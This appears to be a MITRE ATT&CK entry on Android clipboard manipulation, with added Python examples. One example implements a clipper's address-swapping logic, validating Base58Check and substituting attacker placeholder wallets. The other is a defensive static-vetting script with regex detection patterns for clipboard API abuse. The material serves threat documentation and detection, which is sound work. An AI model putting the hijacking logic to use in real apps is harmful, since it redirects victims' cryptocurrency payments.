Data Manipulation: Transmitted Data Manipulation

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.

One method to achieve Transmitted Data Manipulation is by modifying the contents of the device clipboard. Malicious applications may monitor clipboard activity through the ClipboardManager.OnPrimaryClipChangedListener interface on Android to determine when clipboard contents have changed. Prior to Android 10, listening for clipboard changes, reading clipboard contents, and modifying clipboard contents required no explicit application permission and could be performed by applications running in the background. Android 10 changed this behavior: an application can access clipboard data only while it is the app in focus or is the device's default input method editor (IME); a background app is no longer notified of clip changes and receives no data when it queries the clipboard.

Adversaries may use Transmitted Data Manipulation to replace text before it is pasted, for example replacing a copied Bitcoin wallet address with a wallet address that is under adversary control. Because the replacement happens between the copy and the paste, the victim pastes a well-formed address and the wallet application has no way to tell that it differs from the one the user copied.

Transmitted Data Manipulation was seen in the Android/Clipper.C trojan. This sample was detected by ESET in an application distributed through the Google Play Store that targeted cryptocurrency wallet addresses.[1]
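The address-swapping decision described above, modelled in plain Python as an added example. This is not code from the ATT&CK page, from Android/Clipper.C, or from S.O.V.A.; on a device the same logic would sit inside an OnPrimaryClipChangedListener callback written in Java or Kotlin. It shows the part that makes a clipper effective: the copied text is only rewritten when it is a single cryptocurrency address, and the substitute is an address of the same type that passes the wallet's format check (for legacy Bitcoin addresses the Base58Check checksum is verified on the way in, and the substitute is built with a valid checksum). The attacker addresses are constructed placeholders; the Bitcoin one is derived from 20 zero bytes.

```python
"""Clipper-style clipboard address substitution (added illustration, not
code from the ATT&CK page or from any named malware sample)."""
import hashlib
import re

BASE58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58encode(data: bytes) -> str:
    """Base58 encode; each leading zero byte becomes a leading '1'."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = BASE58[rem] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def b58decode(s: str) -> bytes:
    """Inverse of b58encode; raises ValueError on a non-alphabet character."""
    n = 0
    for ch in s:
        n = n * 58 + BASE58.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def base58check_address(version: int, hash160: bytes) -> str:
    """Build a Base58Check address from a version byte and a 20-byte hash."""
    payload = bytes([version]) + hash160
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return b58encode(payload + checksum)


def is_valid_base58check(addr: str) -> bool:
    """True if addr decodes to 25 bytes whose trailing 4 bytes are a valid checksum."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def classify_address(text: str):
    """Return 'btc_legacy', 'btc_bech32', 'eth', or None for a clipped string."""
    s = text.strip()
    if re.fullmatch(r"[13][1-9A-HJ-NP-Za-km-z]{25,34}", s) and is_valid_base58check(s):
        return "btc_legacy"
    if re.fullmatch(r"bc1[ac-hj-np-z02-9]{11,71}", s.lower()):
        return "btc_bech32"  # format only; the bech32 checksum is not verified here
    if re.fullmatch(r"0x[0-9a-fA-F]{40}", s):
        return "eth"  # format only; the optional EIP-55 case checksum is not verified here
    return None


# Constructed attacker-controlled addresses (placeholders, not real wallets).
ATTACKER = {
    "btc_legacy": base58check_address(0x00, bytes(20)),  # "1111111111111111111114oLvT2"
    "btc_bech32": "bc1q" + "z" * 38,
    "eth": "0x" + "dead" * 10,
}


def hijack_clip(clip_text: str, attacker=ATTACKER):
    """What a clipper does on each clip-changed callback.

    Returns (text_to_write_back, replaced_type). replaced_type is None when
    the clip is left alone, which is the common case: only a clip that is a
    single address is rewritten, so ordinary copied text is never corrupted
    and the user has nothing visible to notice.
    """
    kind = classify_address(clip_text)
    if kind is None:
        return clip_text, None
    return attacker[kind], kind


if __name__ == "__main__":
    # Bitcoin genesis-block address: a real, valid Base58Check string used only as input.
    for clip in ["1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa", "0x" + "ab" * 20, "meet at 10"]:
        print(repr(clip), "->", hijack_clip(clip))
```

The Base58Check validation is what separates a clipper that works from one that does not: a wallet app rejects an address with a bad checksum, so the substitute must carry a correct one, and the malware must avoid rewriting strings that merely look address-shaped. Note that the same validator is useful on the defensive side; a wallet app can warn when a freshly pasted address differs from one the user typed or scanned moments earlier.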

ID: T1641.001
Sub-technique of: T1641
Tactic Type: Post-Adversary Device Access
Tactic: Impact
Platforms: Android
Version: 1.1
Created: 06 April 2022
Last Modified: 20 March 2023

Procedure Examples

ID     Name      Description
S1062  S.O.V.A.  S.O.V.A. can manipulate clipboard data to replace cryptocurrency addresses.[2]

Mitigations

ID     Mitigation             Description
M1006  Use Recent OS Version  Android 10 prevents applications from accessing clipboard data unless the application is in the foreground (currently has focus) or is set as the device's default input method editor (IME).[3]

Detection

ID      Data Source          Data Component  Detects
DS0041  Application Vetting  API Calls       Applications could be vetted for their use of the clipboard manager APIs, with extra scrutiny given to applications that register a clip-changed listener, read the clipboard, and write it back, and to applications that declare an IME service (which retains clipboard access on Android 10 and later).
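One way to apply the vetting idea above during static triage, as an added example rather than tooling from the ATT&CK page or any vendor. The script runs over the text that decompiling an APK produces (smali from apktool or baksmali, plus the decoded AndroidManifest.xml) and scores the three clipboard operations the page describes: registering an OnPrimaryClipChangedListener, reading the clip with getPrimaryClip(), and writing it back with setPrimaryClip(). An app that does all three matches the clipper pattern; one that also registers an input method service has a way to keep clipboard access on Android 10 and later. The smali lines and manifest fragment are constructed samples, not taken from a real APK, and the labels and thresholds are this example's own choices.

```python
"""Static vetting heuristic for clipboard manipulation in decompiled Android apps
(added example; the sample smali and manifest below are constructed)."""
import re

# Smali call sites for the android.content.ClipboardManager methods the page names.
CLIPBOARD_CALLS = {
    "listen": r"Landroid/content/ClipboardManager;->addPrimaryClipChangedListener\(",
    "read":   r"Landroid/content/ClipboardManager;->getPrimaryClip\(",
    "write":  r"Landroid/content/ClipboardManager;->setPrimaryClip\(",
}
# A class implementing the listener interface directly.
LISTENER_IMPL = r"\.implements Landroid/content/ClipboardManager\$OnPrimaryClipChangedListener;"
# An IME service registration in AndroidManifest.xml.
IME_ACTION = r'android:name="android\.view\.InputMethod"'


def scan_smali(lines):
    """Count clipboard-related call sites and listener implementations in smali text."""
    hits = {name: 0 for name in CLIPBOARD_CALLS}
    hits["listener_class"] = 0
    for line in lines:
        for name, pattern in CLIPBOARD_CALLS.items():
            if re.search(pattern, line):
                hits[name] += 1
        if re.search(LISTENER_IMPL, line):
            hits["listener_class"] += 1
    return hits


def declares_ime(manifest_text):
    """True if the manifest registers an input method service."""
    return re.search(IME_ACTION, manifest_text) is not None


def verdict(hits, has_ime):
    """Map the findings to a triage label ('none', 'low', 'medium', 'high') plus reasons."""
    reasons = []
    listens = hits["listen"] or hits["listener_class"]
    if listens and hits["read"] and hits["write"]:
        label = "high"
        reasons.append("listens for clip changes, reads the clip, and writes it back")
    elif listens and hits["read"]:
        label = "medium"
        reasons.append("monitors and reads the clipboard")
    elif hits["read"] or hits["write"]:
        label = "low"
        reasons.append("uses the clipboard (common in legitimate apps)")
    else:
        label = "none"
    if has_ime and label != "none":
        reasons.append("declares an IME service, which keeps clipboard access on Android 10+")
        if label == "medium":
            label = "high"
    return label, reasons


def vet(smali_lines, manifest_text):
    return verdict(scan_smali(smali_lines), declares_ime(manifest_text))


# Constructed sample: a class that wires up all three clipboard operations.
SAMPLE_SMALI = [
    ".class public Lcom/example/pay/ClipWatcher;",
    ".super Ljava/lang/Object;",
    ".implements Landroid/content/ClipboardManager$OnPrimaryClipChangedListener;",
    "invoke-virtual {v0, p0}, Landroid/content/ClipboardManager;->addPrimaryClipChangedListener(Landroid/content/ClipboardManager$OnPrimaryClipChangedListener;)V",
    "invoke-virtual {v0}, Landroid/content/ClipboardManager;->getPrimaryClip()Landroid/content/ClipData;",
    "invoke-static {v1, v2}, Landroid/content/ClipData;->newPlainText(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Landroid/content/ClipData;",
    "invoke-virtual {v0, v1}, Landroid/content/ClipboardManager;->setPrimaryClip(Landroid/content/ClipData;)V",
]

# Constructed sample: a manifest fragment registering an IME service.
SAMPLE_MANIFEST = """
<service android:name=".KeyboardService" android:permission="android.permission.BIND_INPUT_METHOD">
    <intent-filter><action android:name="android.view.InputMethod"/></intent-filter>
</service>
"""

# Constructed sample: a benign app that only copies text to the clipboard.
BENIGN_SMALI = [
    "invoke-virtual {v0, v1}, Landroid/content/ClipboardManager;->setPrimaryClip(Landroid/content/ClipData;)V",
]

if __name__ == "__main__":
    print(vet(SAMPLE_SMALI, SAMPLE_MANIFEST))
    print(vet(BENIGN_SMALI, ""))
```

This is a triage filter, not a detection on its own: password managers, keyboards, and note-taking apps legitimately hit the same API calls, so a "high" result is a prompt for a reviewer to read the listener's code path and check whether the clip is rewritten based on its content.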

References